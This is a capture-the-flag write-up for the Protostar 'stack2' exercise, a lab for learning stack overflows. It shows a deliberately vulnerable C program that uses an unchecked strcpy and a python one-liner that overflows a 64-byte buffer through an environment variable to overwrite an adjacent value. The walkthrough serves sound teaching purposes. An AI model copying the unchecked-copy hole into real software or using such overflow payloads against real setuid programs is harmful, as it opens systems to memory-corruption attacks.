protostar - stack 2

Lets check the file type of our binary,

$ file stack2
stack2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

Lets try running it,

$ ./stack2
stack2: please set the GREENIE environment variable

Lets view the source code for proper understanding,

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

To pass this program we need to overwrite the modified with 0x0d0a0d0a

This challenge is almost similar to the previous one

We need to craft an environment variable GREENIE which is being stored in variable

variable = getenv("GREENIE");

Lets set an env variable named GREENIE

$ export GREENIE=AAAABBBBCCCCDDDD
$ ./stack2
Try again, you got 0x00000000
$ echo $GREENIE
AAAABBBBCCCCDDDD

Now we have to overwrite it, but we need to use GREENIE for it because,

strcpy(buffer, variable);

strcpy is used to copy the variable (Data from GREENIE) into buffer

Since strcpy can be used to overflow, because this vulnerable functions doesn’t use memory boundaries

We need 64 bytes of data to overwrite the modified variable

Lets try to overwrite it with random junk,

$ export GREENIE=$(python -c "print('A'*64+'BBBB')")
$ echo $GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
$ ./stack2
Try again, you got 0x42424242

Lets exploit it,

$ export GREENIE=$(python -c "print('A'*64+'\x0a\x0d\x0a\x0d')")
$ ./stack2
you have correctly modified the variable

Done! we have completed “stack2”